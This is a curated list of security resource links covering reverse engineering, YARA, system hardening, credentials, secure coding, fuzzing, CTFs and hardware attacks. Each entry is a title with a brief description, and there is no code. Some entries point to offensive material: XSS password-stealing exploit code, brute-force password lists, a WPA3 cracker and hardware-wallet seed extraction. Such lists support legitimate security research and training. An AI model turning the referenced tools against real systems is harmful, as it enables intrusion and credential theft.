pyc2bytecode 133 over 1 year ago : A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries by disassembling and analyzing the compiled python byte-code(.pyc) files across all python versions (including Python 3.10.*)
Reverse Engineering PsExec for fun and knowledge
Reverse Engineering TikTok's VM Obfuscation

CSIRT / Reverse Engineering / Decompilers

decompile_java , using - another java decompiler
NoVmp 1,956 over 3 years ago : A static devirtualizer for VMProtect x64 3.x powered by VTIL
Awesome IDA, x64DBG & OllyDBG plugins 1,283 6 months ago : A curated list of IDA x64DBG and OllyDBG plugins
edb 2,705 3 months ago is a cross-platform AArch32/x86/x86-64 debugger
Interactive Delphi Reconstructor IDR 968 over 1 year ago : a decompiler of executable files (EXE) and dynamic libraries (DLL), written in Delphi and executed in Windows32 environment
PyInstaller Extractor 2,960 10 days ago

CSIRT / Reverse Engineering / Yara

Yara-Rules 4,178 7 months ago : Repository of yara rules
Repository containing Indicators of Compromise and Yara rules 79 over 3 years ago
YARA in a nutshell
yara 8,300 about 2 months ago : The pattern matching swiss knife
mkYARA : Writing YARA rules for the lazy analyst ( )
Yara-Rules 570 11 months ago : Repository of YARA rules made by McAfee ATR Team
ReversingLabs YARA Rules 768 about 1 month ago
YaraHunts 95 over 1 year ago : Random hunting ordiented yara rules
YARA Rules for ProcFilter 84 over 7 years ago
ThreatHunting 568 about 1 month ago
yara-validator 39 about 4 years ago : Validates yara rules and tries to repair the broken ones
Vim Syntax Highlighting for YARA Rules 31 9 months ago : A Vim syntax-highlighting file for YARA rules covering YARA 4.0

CSIRT / Reverse Engineering / Yara / Rules DB:

xored_pefile_mini 10 about 2 years ago : detects files with a PE header at uint32(0x3c), xored with a key of 1, 2 or 4 bytes. by

CSIRT / Reverse Engineering / Ghidra

ghidra : is a software reverse engineering (SRE) framework
ghidra-firmware-utils 399 7 months ago : Ghidra utilities for analyzing firmware
dragondance 285 5 months ago : Binary code coverage visualizer plugin for Ghidra
Decompiler Analysis Engine : Welcome to the Decompiler Analysis Engine. It is a complete library for performing automated data-flow analysis on software, starting from the binary executable
Working With Ghidra's P-Code To Identify Vulnerable Function Calls
GhIDA :
Ghidraaas 779 almost 4 years ago : Ghidra as a Service
SVD-Loader for Ghidra : Simplifying bare-metal ARM reverse engineering
GhidraX64Dbg 56 over 3 years ago : Extract annoations from Ghidra into an X32/X64 dbg database
Reverse Engineering Go Binaries with Ghidra
Introduction to Reverse Engineering with Ghidra: A Four Session Course
Ghidra Plugin Development for Vulnerability Research - Part-1
AngryGhidra 562 4 months ago : Use angr in Ghidra
Defeating Code Obfuscation with Angr
ghidra2frida : The new bridge between Ghidra and Frida
ghidra-scripts 92 about 1 year ago : A collection of my Ghidra scripts
Reversing Raw Binary Firmware Files in Ghidra
Ghidrathon 698 7 months ago : The FLARE team's open-source extension to add
IDA Graph view with outlined function included
G-3PO: A Protocol Droid for Ghidra

CSIRT / Frameworks

Inject code into running Python processes 2,801 about 1 year ago
malspider 418 about 2 years ago : Malspider is a web spidering framework that detects characteristics of web compromises
AIL-framework 1,304 17 days ago : AIL framework - :

CSIRT / Patching

They Did Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes . (CVE-2017-11882)

CSIRT / Hardening

BlueWars : Capture The Flag Defensivo que aconteceu na H2HC
CCAT 442 over 1 year ago : Cisco Config Analysis Tool
Ciderpress 48 about 5 years ago : Hardened wordpress installer
debian-cis 765 2 months ago : PCI-DSS compliant Debian 7/8 hardening
Endlessh 7,320 6 months ago : an SSH tarpit
ERNW Repository of Hardening Guides 611 about 3 years ago : This repository contains various hardening guides compiled by ERNW for various purposes
fero 209 about 6 years ago : YubiHSM2-backed signing server
FirewallChecker 101 about 3 years ago : A self-contained firewall checker
Get SSH login notification on Telegram
Hardentools 2,931 8 months ago is a utility that disables a number of risky Windows features
How To Secure A Linux Server 17,554 about 1 month ago : An evolving how-to guide for securing a Linux server
kconfig-hardened-check 1,690 13 days ago : A tool for checking the hardening options in the Linux kernel config
Implementing Least-Privilege Administrative Models
Iptables Essentials 1,483 over 4 years ago : Common Firewall Rules and Commands
iptables-essentials 1,483 over 4 years ago : Iptables Essentials: Common Firewall Rules and Commands
Keyringer : encrypted and distributed secret sharing software
Keystone Project . Github:
linux-hardened 5 over 6 years ago : Minimal supplement to upstream Kernel Self Protection Project changes
List of sites with two factor auth 3,388 8 days ago
nftables : nftables is the successor to iptables. It replaces the existing iptables, ip6tables, arptables and ebtables framework. It uses the Linux kernel and a new userspace utility called nft. nftables provides a compatibility layer for the ip(6)tables and framework
Common approaches to securing Linux servers and what runs on them. Nice article with a lot of resources:
opmsg 750 over 1 year ago : is a replacement for gpg which can encrypt/sign/verify your mails or create/verify detached signatures of local files. Even though the opmsg output looks similar, the concept is entirely different
prowler 10,839 7 days ago : AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and additional checks. Official CIS for
reconbf 47 about 8 years ago : Recon system hardening scanner
Sarlacc 44 over 6 years ago is an SMTP server that I use in my malware lab to collect spam from infected hosts
Secure & Ad-free Internet Anywhere With Streisand and Pi Hole
Secure Secure Shell by
Securing Docker Containers
securityonion-docs 84 6 days ago
security.txt : A proposed standard which allows websites to define security policies
security-txt 1,797 almost 2 years ago : A proposed standard that allows websites to define security policies
Hardenize See your site config with
Set up two-factor authentication for SSH on Fedora
solo-hw 182 almost 5 years ago : Hardware sources for Solo
ssh-auditor 608 11 months ago : The best way to scan for weak ssh passwords on your network
Streisand 23,195 over 3 years ago sets up a new server running your choice of WireGuard, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, or a Tor bridge. It also generates custom instructions for all of these services. At the end of the run you are given an HTML file with instructions that can be shared with friends, family members, and fellow activists
The Practical Linux Hardening Guide 9,947 over 4 years ago : 🔥 This guide details the planning and the tools involved in creating a secure Linux production systems - work in progress
tls-what-can-go-wrong 100 almost 6 years ago : TLS - what can go wrong?
upvote 452 about 3 years ago : A multi-platform binary whitelisting solution
Using a Hardened Container Image for Secure Applications in the Cloud
Zero-knowledge attestation
Reverie : An optimized zero-knowledge proof system

CSIRT / Hardening / RHEL Like systems:

CentOS7 Lockdown 73 almost 3 years ago
RHEL7-CIS 30 over 4 years ago : Ansible RHEL 7 - CIS Benchmark Hardening Script
cisecurity 9 over 4 years ago : Configures Linux systems to Center for Internet Security Linux hardening standard

CSIRT / Hardening

bdshemu : The shellcode emulator
IPv6 Security Best Practices
auditd 1,497 about 1 month ago : Best Practice Auditd Configuration
Hardened/PaX Quickstart
tosh 417 over 3 years ago : Imagine your SSH server only listens on an IPv6 address, and where the last 6 digits are changing every 30 seconds as a TOTP code

CSIRT / Hardening / Kubernetes:

9 Kubernetes Security Best Practices Everyone Must Follow
Kubernetes Hardening Guidance NSA/CISA

CSIRT / Hardening

CHAPS 173 7 months ago : Configuration Hardening Assessment PowerShell Script (CHAPS)
Awesome Windows Domain Hardening 1,749 almost 5 years ago : A curated list of awesome Security Hardening techniques for Windows
NSA/CISA Kubernetes Hardening Guidance
Learn and Test DMARC : Visualizing the communication between email servers will help you understand what SPF, DKIM, and DMARC do and how these mechanisms work
VideoLan Robots.txt
ssh & linux cheat sheets
ssh-audit 3,417 about 1 month ago : SSH server & client auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc)

CSIRT / Hardening / WebServers / A lot of good posts by geek flare:

How to Configure SSL Certificate on Google Cloud Load Balancer?
Nginx Web Server Security & Hardening Guide
IBM HTTP Server Security & Hardening Guide
Apache Tomcat Hardening and Security Guide
How to Enable TLS 1.3 in Nginx, Cloudflare?
Apache Web Server Hardening & Security Guide (broken!??)

CSIRT / Hardening / WebServers / CaCerts

List of free rfc3161 servers. TSA Servers
certstream-server 271 8 months ago : Certificate Transparency Log aggregation, parsing, and streaming service written in Elixir

CSIRT / Hardening / WebServers / Apache:

Apache Security by
dotdotslash 418 5 months ago : An tool to help you search for Directory Traversal Vulnerabilities
A new security header: Feature Policy
How do I prevent apache from serving the .git directory?

CSIRT / Hardening / WebServers / Nginx:

20 Essential Things to Know if You’re on Nginx Web Server
Nginx C function : Create your desired C application on top of nginx module
NGINX config for SSL with Let's Encrypt certs
How to Configure Nginx SSL Certifcate Chain

CSIRT / Hardening / WebServers / PHP:

Cheatsheet for finding vulnerable PHP code using grep 346 over 6 years ago : This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function
It's All About Time . - A tool for performing feasibility analyses of timing attacks. : A tool for performing network timing attacks on plaintext and hashed password authentication
snuffleupagus 26 about 1 year ago : Security module for php7 - Killing bugclasses and virtual-patching the rest!
FOPO-PHP-Deobfuscator 86 over 7 years ago : A simple script to deobfuscate PHP file obfuscated with FOPO Obfuscator
Decode.Tools : Decode PHP Obfuscator by FOPO

CSIRT / Hardening / WebServers / Ruby:

TSS - Threshold Secret Sharing 23 over 3 years ago : A Ruby implementation of Threshold Secret Sharing (Shamir) as defined in IETF Internet-Draft draft-mcgrew-tss-03.txt

CSIRT / Hardening / WebServers

IT Security Guidelines for Transport Layer Security (TLS)
A new security header: Feature Policy
CAA Mandated by CA/Browser Forum
dotdotslash 418 5 months ago : An tool to help you search for Directory Traversal Vulnerabilities
ENVOY is an open source edge and service proxy, designed for cloud-native applications
ghp 262 almost 6 years ago : A simple web server for serving static GitHub Pages locally
LEAR 168 almost 6 years ago : Linux Engine for Asset Retrieval
NFHTTP 588 over 1 year ago : A cross platform C++ HTTP library that interfaces natively to other platforms
Security/Server Side TLS by Mozilla
security.txt : A proposed standard which allows websites to define security policies
urlscan.io : A sandbox for the web
IT Security Guidelines for Transport Layer Security (TLS)
QUIC's combined transport- and cryptographic handshake allows it to be 1 Round Trip faster than TCP + TLS and main problems.
Secure Headers 3,164 11 days ago : Manages application of security headers with many safe defaults
HTTP/2: The Sequel is Always Worse
A File Format to Aid in Security Vulnerability Disclosure RFC 9116:

CSIRT / Credentials

WhiteIntel : WhiteIntel assists companies in identifying compromised credentials through malware campaigns
Cr3dOv3r 2,025 about 1 month ago Search if your credentials where leaked:
pw-pwnage-cfworker 154 over 2 years ago : Deploy a Cloudflare Worker to sanely score users' new passwords with zxcvbn AND check for matches against haveibeenpwned's 5.1+ billion breached accounts
XSS Exploit code for retrieving passwords stored in a Password Vault
login_duress 108 3 months ago : A BSD authentication module for duress passwords
XSStrike 13,378 4 months ago : Most advanced XSS detection suite
Was my password leaked? : Search for creadentials leaked on pwndb
bitwarden_rs 39,076 7 days ago : Unofficial Bitwarden compatible server written in Rust
pcfg_cracker 321 4 months ago : Probabilistic Context Free Grammar (PCFG) password guess generator
Depix 26,007 3 months ago : Recovers passwords from pixelized screenshots
pwndb 1,306 over 3 years ago : Search for leaked credentials
Password Lists 319 6 months ago : Password lists with top passwords to optimize bruteforce attacks
pwndb.py 1,306 over 3 years ago :
awsome 429 4 months ago KeePass :Curated list of KeePass-related projects

CSIRT / Credentials / awsome

KeePassium 1,201 7 days ago : KeePass-compatible password manager for iOS
Launch PowerShell Script From Within KeePass And Include Password Secure String Credential , ,
libkeepass 103 about 4 years ago : Python module to read KeePass 1.x/KeePassX (v3) and KeePass 2.x (v4) files
KeepassXC-Pwned 35 28 days ago : Check your keepassxc database against previously breached haveibeenpwned passwords

CSIRT / Credentials / Tokens

Use YubiKey security key to sign into AWS Management Console with YubiKey for multi-factor authentication
Introducing the Qubes U2F Proxy
YubiKey-Guide 11,198 19 days ago : Guide to using YubiKey for GPG and SSH
Using a Yubikey for GPG and SSH : Sebastian Neef - 0day.work
PIN and Management Key
Improve login security with challenge-response authentication
URU Card : Arduino FIDO2 Authenticator
YubiKey at Datadog 495 10 months ago
This is a practical guide to using YubiKey as a SmartCard for storing GPG encryption and signing keys. 11,198 19 days ago
yubikey-ssh-setup 3,243 about 1 month ago

CSIRT / Secure Programming

Executable-Space Protection and ASLR Hardening C/C++ Programs Part II:
Checklist of the most important security countermeasures when designing, testing, and releasing your API 22,480 7 days ago
sanitizers 11,517 20 days ago
Gitian is a secure source-control oriented software distribution method
Canary 30 over 5 years ago : Input Detection and Response
Canarytokens by Thinkst,
CANARY FILES: GENERATING FAKE FILES TO DETECT CRITICAL DATA LOSS FROM COMPLEX COMPUTER NETWORKS
How to Know if Someone Access your Files with Canary Tokens
Wycheproof 2,787 3 months ago : Project Wycheproof tests crypto libraries against known attacks
Web App Security 101 : Keep Calm and Do Threat Modeling

CSIRT / Secure Programming / SSL/TLS for dummies:

part 1 : Ciphersuite, Hashing, Encryption;
part 2 : Understanding key exchange algorithm;
part 3 : Understanding Certificate Authority

CSIRT / Secure Programming

heaphopper 212 about 2 months ago : HeapHopper is a bounded model checking framework for Heap-implementations
Ristretto is a technique for constructing prime order elliptic curve groups with non-malleable encodings
SEI CERT C Coding Standard : The C rules and recommendations in this wiki are a work in progress and reflect the current thinking of the secure coding community. Because this is a development website, many pages are incomplete or contain errors. As rules and recommendations mature, they are published in report or book form as official releases. These releases are issued as dictated by the needs and interests of the secure software development community

CSIRT / Secure Programming / SEI CERT C Coding Standard

MSC24-C. Do not use deprecated or obsolescent functions
US-CERT: memcpy_s() and memmove_s()

CSIRT / Secure Programming

Safe C Library 13 over 9 years ago : The Safe C Library provides bound checking memory and string functions per ISO/IEC TR24731. These functions are alternative functions to the existing standard C library that promote safer, more secure programming
Field Experience With Annex K — Bounds Checking Interfaces
TSLint 5,906 over 3 years ago : An extensible linter for the TypeScript language
rubocop 12,650 5 days ago : A Ruby static code analyzer and formatter, based on the community Ruby style guide
Librando : transparent code randomization for just-in-time compilers
Checked C : Making C Safe by Extension
Practical case: Buffer Overflow 0x01
pigaios 635 almost 2 years ago : A tool for diffing source codes directly against binaries
pigaios 635 almost 2 years ago : A tool for diffing source codes directly against binaries
A Git Horror Story : Repository Integrity With Signed Commits. How to use git securely (signing commits)
An Introduction to Dynamic Symbolic Execution and the KLEE Infrastructure
Tooling for verification of PGP signed commits 79,540 7 days ago
tlse 545 about 1 month ago : Single C file TLS 1.2/1.3 implementation, using tomcrypt as crypto library
tinyalloc 778 4 months ago : malloc / free replacement for unmanaged, linear memory situations (e.g. WASM, embedded devices...)
Sandboxed API 1,667 7 days ago : Sandboxed API automatically generates sandboxes for C/C++ libraries
HACL* 1,627 9 days ago : a formally verified cryptographic library written in F*
Villoc 602 over 4 years ago : Villoc is a heap visualisation tool, it's a python script that renders a static html file
How C array sizes become part of the binary interface of a library
MazuCC 516 about 4 years ago : A minimalist C compiler with x86_64 code generation
When the going gets tough : Understanding the challenges with Product commoditization in SCA
huskyCI 576 6 months ago : huskyCI is an open source tool that performs security tests inside CI pipelines of multiple projects and centralizes all results into a database for further analysis and metrics
GTER 47 | GTS 33 - Dia 2 (parte 1) (pt-br) : nice talk by Daniel Carlier and Silvia Pimpão
HTTP Security Headers A Complete Guide
SAFECode : is a non-profit organization exclusively dedicated to increasing trust in information and communications technology products and services through the advancement of effective software assurance methods
Security Code Review 101
Elliptic Curve Cryptography Explained
Cheatsheet for finding vulnerable PHP code using grep 346 over 6 years ago : This will assist you in the finding of potentially vulnerable PHP code. Each type of grep command is categorized in the type of vulnerabilities you generally find with that function
How to Process Passwords as a Software Developer
QL 7,701 4 days ago : The libraries and queries that power CodeQL and LGTM.com
Sendy is Insecure : How Not to Implement reCAPTCHA
Cheating in Elliptic Curve Billiards 2 Win10 Crypto Vulnerability:
DevSecOps : Securing Software in a DevOps World
GitGuardian Documentation and Resources 1,917 over 5 years ago : Resources to help you keep secrets (API keys, database credentials, certificates, ...) out of source code and remediate the issue in case of a leaked API key. Made available by GitGuardian
Vuln Cost - Security Scanner for VS Code 202 over 2 years ago : Find security vulnerabilities in open source npm packages while you code
Most Popular Analysis Tools by Programming Language
Deepsource : tool that analyzes your repository
git-wild-hunt 292 almost 2 years ago : A tool to hunt for credentials in github wild AKA git*hunt
shhgit 3,839 about 1 year ago : Ah Find GitHub secrets in real time
A Graduate Course in Applied Cryptography
KaiMonkey 96 11 months ago : Vulnerable Terraform Infrastructure. KaiMonkey provides example vulnerable infrastructure to help cloud security, DevSecOps and DevOps teams explore and understand common cloud security threats exposed via infrastructure as code
You don’t need reproducible builds.
Comments on build reproducibility
Integrating Security in the Development Pipeline DevSecOps –
SLSA 1,555 4 days ago : Supply-chain Levels for Software Artifacts, Proposal
DazedAndConfused is a tool to help determine dependency confusion exposure
Security Scorecards 4,600 4 days ago : Security health metrics for Open Source
kcare-uchecker 184 9 months ago : A simple tool to detect outdated shared libraries
Package Hunter : A tool for identifying malicious dependencies via runtime monitoring
What science can tell us about C and C++'s security
Awesome AppSec 6,329 5 months ago : A curated list of resources for learning about application security
Comments on build reproducibility

CSIRT / Secure Programming / Web Training

OWASP Broken Web Applications Project . repository
dvna 705 8 months ago : Damn Vulnerable NodeJS Application
VulnLab 385 4 months ago : A web vulnerability lab project developed by Yavuzlar

CSIRT / Secure Programming / SAST

Static analysis powered security scanner for your terraform code 6,718 about 2 months ago
Scan (skæn) is a free open-source security audit tool for modern DevOps teams. : A Free & Open Source DevSecOps Platform
Coccinelle : is a program matching and transformation engine which provides the language SmPL (Semantic Patch Language) for specifying desired matches and transformations in C code
brakeman 7,015 9 days ago : A static analysis security vulnerability scanner for Ruby on Rails applications
How disable comments make static analysis tools worse
A Large-Scale Security-Oriented Static Analysis of Python Packages in PyPI
Potential remote code execution in PyPI
What's New with SAST + DAST
DevSecOps with DAST and Security Hub
Sonarqube Community Branch Plugin 2,251 5 days ago : A plugin that allows branch analysis and pull request decoration in the Community version of Sonarqube
SAST Analyzers
Pip-audit : Google-backed tool probes Python environments for vulnerable packages
trivy 23,679 8 days ago : Scanner for vulnerabilities in container images, file systems, and Git repositories, as well as for configuration issues
Horusec
Source Code Analysis Tools
COVERITY SCAN
Trojan Source : invisible Source Code Vulnerabilities
Warn users when a PR contains some characters : Unicode bi-directional characters can be present but unseen and thus missed during the review. With this PR, we create a list of characters that we want to warn the users about if present in a PR. Since that list is configurable, it can be extended as needed/desired
ikos 2,292 about 2 months ago : Static analyzer for C/C++ based on the theory of Abstract Interpretation
A Guide On Implementing An Effective SAST Workflow

CSIRT / Secure Programming / Secure Web dev / OWASP:

Introduction to OWASP Top 10 2021
OWASP Web Security Testing Guide 7,338 27 days ago : The Web Security Testing Guide is a comprehensive Open Source guide to testing the security of web applications and web services
OWASP-Testing-Checklist 1,506 almost 2 years ago
OWASP-Web-Checklist 1,747 over 2 years ago : OWASP Web Application Security Testing Checklist
Projects/OWASP Node js Goat Project ,
DependencyCheck 6,441 7 days ago : OWASP dependency-check is a software composition analysis utility that detects publicly disclosed vulnerabilities in application dependencies
OWASP Risk Assessment Calculator
OWASP Top 10 Proactive Controls 2018
OWASP API Security Project
Exploiting OWASP Top 10 API Vulnerabilities
vAPI 1,177 over 1 year ago is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios in the means of Exercises

CSIRT / Secure Programming / Secure Web dev / OWASP: / CheatSheets:

CheatSheetSeries 28,160 4 days ago : The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics
Password Storage Cheat Sheet
Database Security Cheat Sheet

CSIRT / Secure Programming / Secure Web dev / OWASP:

OWASP Cornucopia

CSIRT / Secure Programming / Secure Web dev

The 2021 CWE Most Important Hardware Weaknesses
secDevLabs 901 about 2 months ago : A laboratory for learning secure web development in a practical manner
Secure Modular Runtimes
WebSecurity Academy
Prototype pollution – and bypassing client-side HTML sanitizers
Understanding the CSRF Vulnerability (A Beginner’s Guide)
VulnyCode 398 over 2 years ago : PHP Code Static Analysis. Python script to detect vulnerabilities inside PHP source code using static analysis, based on regex
PwnMachine 302 4 months ago : PwnMachine is a self hosting solution based on docker aiming to provide an easy to use pwning station for bughunters
WebSploit Labs : is a learning environment created by Omar Santos for different Cybersecurity Ethical Hacking (Web Penetration Testing) training sessions
Password Storage Cheat Sheet
Database Security Cheat Sheet
Introduction - OWASP Cheat Sheet Series
Stop Password Masking : Usability suffers when users type in passwords and the only feedback they get is a row of bullets. Typically, masking passwords doesn't even increase security, but it does cost you business due to login failures
Forgot password? Taking over user accounts Kaminsky style
CWE Top 25 Most Dangerous Software Weaknesses
Datashare Server Mode 597 8 days ago
GitLab analysis of OWASP Top 10 changes from 2004 to 2021
oxAuth 424 about 1 month ago : OAuth 2.0 server and client; OpenID Connect Provider (OP) & UMA Authorization Server (AS)
Prototype Pollution in Python

CSIRT / Secure Programming / Formal Analysis

A Formal Analysis of IEEE 802.11's WPA2: Models and Proofs . /
SCYTHE's Community Threats Repository : Share SCYTHE threats with the community. #ThreatThursday adversary emulation plans will be shared here

CSIRT / Secure Programming / Fuzzing

Generating Software Tests ( )
afl-unicorn : Fuzzing Arbitrary Binary Code
Regaxor 43 over 6 years ago : A regular expression fuzzer
BrokenType 430 about 5 years ago : TrueType and OpenType font fuzzing toolset
Dizzy-legacy 34 over 7 years ago : Network and USB protocol fuzzing toolkit
Start-Hollow.ps1 2,613 about 3 years ago : My musings with PowerShell
auditd-attack 778 over 4 years ago : A Linux Auditd rule set mapped to MITRE's Attack Framework
Dizzy-legacy 34 over 7 years ago : Network and USB protocol fuzzing toolkit
BFuzz 309 almost 2 years ago : Fuzzing Browsers
Structure-Aware Fuzzing with libFuzzer 1,431 about 3 years ago with
Fuzzilli 1,890 7 days ago : A JavaScript Engine Fuzzer
Materials from Fuzzing Bay Area meetups 68 almost 5 years ago
javafuzz 228 over 3 years ago : Javafuzz is coverage-guided fuzzer for testing Java packages
onefuzz 2,821 about 1 year ago : A self-hosted Fuzzing-As-A-Service platform
Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage
ffuf 12,704 5 months ago : Fast web fuzzer written in Go
rFuss2 23 over 3 years ago : Simple rust fuzzer
RESTler finds security and reliability bugs through automated fuzzing . : is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services. : Source code for self-hosted service developed for Azure, including the API, orchestration engine, and default set of security tools (including MSR's RESTler), that enables developers to embed security tooling into their CI/CD workflows
Jackalope 1,094 2 months ago : Binary, coverage-guided fuzzer for Windows and macOS
Dynamic Program Analysis by Dmitry Vyukov:
Fuzzing the Linux Kernel by Andrey Konovalov
Fuzzing sockets: Apache HTTP, Part 2: Custom Interceptors
AFLplusplus 5,202 7 days ago : The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel & redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!
s a n d s i f t e r 485 about 6 years ago : The x86 processor fuzzer
sandsifter 485 about 6 years ago : The x86 processor fuzzer
Fuzzing-101 3,222 6 months ago : Do you want to learn how to fuzz like a real expert, but don't know how to start?
The Challenges of Fuzzing 5G Protocols
Fuzzing Workshops
AFLNet 872 4 months ago : A Greybox Fuzzer for Network Protocols
ClusterFuzz : is a scalable fuzzing infrastructure that finds security and stability issues in software
Introduction to VirtualBox security research

CSIRT / Secure Programming / API

The Web API Checklist : 43 Things To Think About When Designing, Testing, and Releasing your API
API-Security-Checklist 22,480 7 days ago : Checklist of the most important security countermeasures when designing, testing, and releasing your API
REST API Checklist
Your Comprehensive Web API Design Checklist
API Security Testing : Rules And Checklist

CSIRT / Secure Programming / API / API Security Testing

Part 1 of 3
Part 2 of 3
Part 3 of 3

CSIRT / Secure Programming / API

API Security Checklist 22,480 7 days ago : Checklist of the most important security countermeasures when designing, testing, and releasing your API
Istio 36,086 5 days ago : An open platform to connect, manage, and secure microservices
How to contact Google SRE: Dropping a shell in cloud SQL
hack-requests 466 over 1 year ago : The hack-requests is an http network library for hackers
Free API and Microservice Books
MindAPI 823 about 2 months ago : Organize your API security assessment by using MindAPI. It's free and open for community collaboration
OWASP API Security Project
Here you can find a variaty of resources to help you out on the API security path.
Introducing vAPI – an open source lab environment to learn about API security
REST API Testing Tutorial : Sample Manual Test Case
REST Security Cheat Sheet 28,160 4 days ago : CheatSheetSeries
Penetration Testing RESTful Web Services
RESTful web services penetation testing
Astra : Automated Security Testing for REST API’s
bad_json_parsers 366 almost 2 years ago : Exposing problems in json parsers of several programming languages

CSIRT / CTFs / CTFd:

Deploying CTFd
CTFd Tips

CSIRT / CTFs

Mellivora 441 11 months ago is a CTF engine written in PHP
Boss of the SOC (BOTS) Dataset Version 3 290 over 4 years ago
SA-ctf_scoreboard 118 almost 3 years ago
The fast, easy, and affordable way to train your hacking skills.
Write-ups for crackmes and CTF challenges 49 almost 2 years ago by eleemosynator
pwntools 12,117 21 days ago : CTF framework and exploit development library
google-ctf 4,529 9 days ago
Pwn2Win 2018
Leap Security
35c3ctf-challs 88 almost 6 years ago
ctf-tasks 608 almost 3 years ago : An archive of low-level CTF challenges developed over the years
$50 million CTF Writeup 586 over 5 years ago
Alice sent Bob a meme UTCTF 2019. tl;dr: Extract data from given images using binwalk, Tranform given diophantine equation into a cubic curve and retrieve EC parameters, Solve ECDLP given in extracted data using Pohlig Hellman Algorithm
RsaCtfTool 5,743 8 days ago : RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data
RECOVERING A FULL PEM PRIVATE KEY WHEN HALF OF IT IS REDACTED
BalsnCTF-2019 33 over 1 year ago by CykuTW
HackTheBox CTF Cheatsheet 1,544 over 1 year ago : This cheasheet is aimed at the CTF Players and Beginners to help them sort Hack The Box Labs on the basis of Operating System and Difficulty
Mumbai:1 Vulnhub Walkthrough
0x0G 2020 CTF
FIRST SecLounge CTF 2020 Solutions
Hitcon2017CTF - 家徒四壁Everlasting Imaginative Void
r2dec
SASatHome
Crypton 1,491 over 3 years ago : Library consisting of explanation and implementation of all the existing attacks on various Encryption Systems, Digital Signatures, Key Exchange, Authentication methods along with example challenges from CTFs
Bash injection without letters or numbers - 33c3ctf hohoho
Writeup CTF - Web API Exploitation
Closing Capture the Flag Session & Winning Team Presentation
attack & defense CTF demo 15 over 6 years ago
Deploying CTFd
ctftool 1,641 about 3 years ago : Interactive CTF Exploration Tool
CTF-Writeups 15 over 2 years ago : writeups for Capture The Flag Competitions
Capture the Flag
DEF CON CTF 2021 QUALS and ,
eDump
HITB SECCCONF EDU CTF 2021 19 about 3 years ago : Developed with  by Hackerdom team and HITB
Planilhas Baby Latinoware CTF 2021
CTF KAVACON 21 – LUZ ROJA, LUZ VERDE
RET2 WarGames
CTF: Aprende «hacking» jugando (es)
HackLab #1 (es)
Penetration testing laboratories "Test lab" emulate an IT infrastructure of real companies and are created for a legal pen testing and improving penetration testing skills
Solving Zden’s “1BiTCoiN WHiTe PaPeR” Puzzle

CSIRT / CTFs / CTFs tools

CTFs-Exploits 1 about 2 years ago
nc-chat-ctf 4 over 7 years ago : Chat Server for CTF Players wrapped in SSL
thg-framework 8 almost 2 years ago
Super-Guesser-ctf 109 over 2 years ago
Ciphr 115 over 6 years ago : CLI crypto swiss-army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses
sec-tools 650 over 3 years ago : A set of security related tools
Real World CTF 2023 : Solving a Java CTF challenge by writing static analysis passes!

CSIRT / Phreak

ss7MAPer ( )
Into the wild: Gaining access to SS7 - Part 1: Finding an access point
SCTP/SIGTRAN & SS7 Overview
Security Penetration Test Framework for the Diameter Protocol
Signaling Security in LTE Roaming
Phrack

CSIRT / Archs

LAB ENVIRONMENT ARM
HUB Azure IoT
A collection of vulnerable ARM binaries for practicing exploit development 898 about 3 years ago
arm vm working out of the box for everyone 867 about 2 years ago
Statically compiled ARM binaries for debugging and runtime analysis. 462 over 3 years ago
Hacker Finds Hidden 'God Mode' on Old x86 CPUs -> : Hardware backdoors in some x86 CPUs
USBHarpoon Is a BadUSB Attack with A Twist
Patching Binaries with Radare2 - ARM64 Ground Zero: Part 3-2
A 2018 practical guide to hacking RFID/NFC
riscv-ida 29 about 4 years ago : RISC-V ISA processor module for IDAPro 7.x
mac-age 577 5 days ago : MAC address age tracking
Lexra : Lexra did implement a 32-bit variant of the MIPS architecture
IntelTEX-PoC 509 over 4 years ago : Intel Management Engine JTAG Proof of Concept
me_cleaner 4,505 6 months ago : Tool for partial deblobbing of Intel ME/TXE firmware images
Potential candidate for open source bootloaders? Complete removal of Intel ME firmware possible on certain Intel HEDT/Server platforms
IDA-scripts 93 over 5 years ago : IDAPro scripts/plugins
Something about IR optimization : Hi hackers! Today I want to write about optimizing IR in the MoarVM JIT, and also a little bit about IR design itself
Dragonblood : Analysing WPA3's Dragonfly Handshake
The Hacker's Hardware Toolkit 2,078 about 4 years ago : The best hacker's gadgets for Red Team pentesters and security researchers
Unfixable Seed Extraction on Trezor A practical and reliable attack. An attacker with a stolen device can extract the seed from the device. It takes less than 5 minutes and the necessary materials cost around 100$
Extracting seed from Ellipal wallet
Breaking Trezor One with Side Channel Attacks : A Side Channel Attack on PIN verification allows an attacker with a stolen Trezor One to retrieve the correct value of the PIN within a few minutes
Rewriting Functions in Compiled Binaries
Deep Dive : Machine Check Error Avoidance on Page Size Change
Saleae : Saleae logic analyzers are used by electrical engineers, firmware developers, enthusiasts, and engineering students to record, measure, visualize, and decode the signals in their electrical circuits
wacker 295 over 1 year ago : A WPA3 dictionary cracker
Osiris :
One Glitch to Rule Them All: Fault Injection Attacks Against AMD's Secure Encrypted Virtualization

CSIRT / Archs / Hardware

Wifi-Ducky-ESPUSB 7 about 4 years ago
USB Attacks: Past, Present and Future , - P4wnP1 is below on pentesting section
PLATYPUS : With PLATYPUS, we present novel software-based power side-channel attacks on Intel server, desktop and laptop CPUs
VoltPillager : Hardware-based fault injection attacks against Intel SGX Enclaves using the SVID voltage scaling interface
Analyzing a buffer overflow in the DLINK DIR-645 with Qiling framework, Part I 30 about 4 years ago
ToorCon 14 Badge , and
